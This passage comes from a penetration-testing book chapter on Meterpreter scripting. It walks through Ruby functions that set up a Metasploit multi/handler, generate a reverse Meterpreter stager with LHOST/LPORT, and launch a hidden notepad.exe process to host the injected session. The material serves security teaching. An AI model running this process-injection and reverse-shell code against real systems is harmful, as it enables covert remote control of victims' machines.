Meterpreter Scripting
239
We then write the memory to our process using
host_process.memory.write
at
and create a new thread using
host_process.thread.create
at .
Next we define the multi-handler that handles the connections based
on the selected payload, as shown in boldface in the following output. (The
default is Meterpreter, so the multi-handler will handle Meterpreter sessions
unless otherwise specified.)
# Function for creation of connection handler
#-------------------------------------------------------------------------------
def create_multi_handler(payload_to_inject)
mul = @client.framework.exploits.create("multi/handler")
mul.share_datastore(payload_to_inject.datastore)
mul.datastore['WORKSPACE'] = @client.workspace
mul.datastore['PAYLOAD'] = payload_to_inject
mul.datastore['EXITFUNC'] = 'process'
mul.datastore['ExitOnSession'] = true
print_status("Running payload handler")
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'RunAsJob' => true
)
end
The
pay = client.framework.payloads.create(payload)
call in the following
section allows us to create a payload from the Metasploit Framework. Because
we know this is a Meterpreter payload, Metasploit will automatically generate
it for us.
# Function for Creating the Payload
#-------------------------------------------------------------------------------
def create_payload(payload_type,lhost,lport)
print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
payload = payload_type
pay = client.framework.payloads.create(payload)
pay.datastore['LHOST'] = lhost
pay.datastore['LPORT'] = lport
return pay
end
The next option spawns a process using Notepad by default. If we didn’t
specify a process, it would have created a Notepad process for us automatically.
# Function that starts the notepad.exe process
#-------------------------------------------------------------------------------
def start_proc()
print_good("Starting Notepad.exe to house Meterpreter Session.")
proc = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
print_good("Process created with pid #{proc.pid}")
return proc.pid
end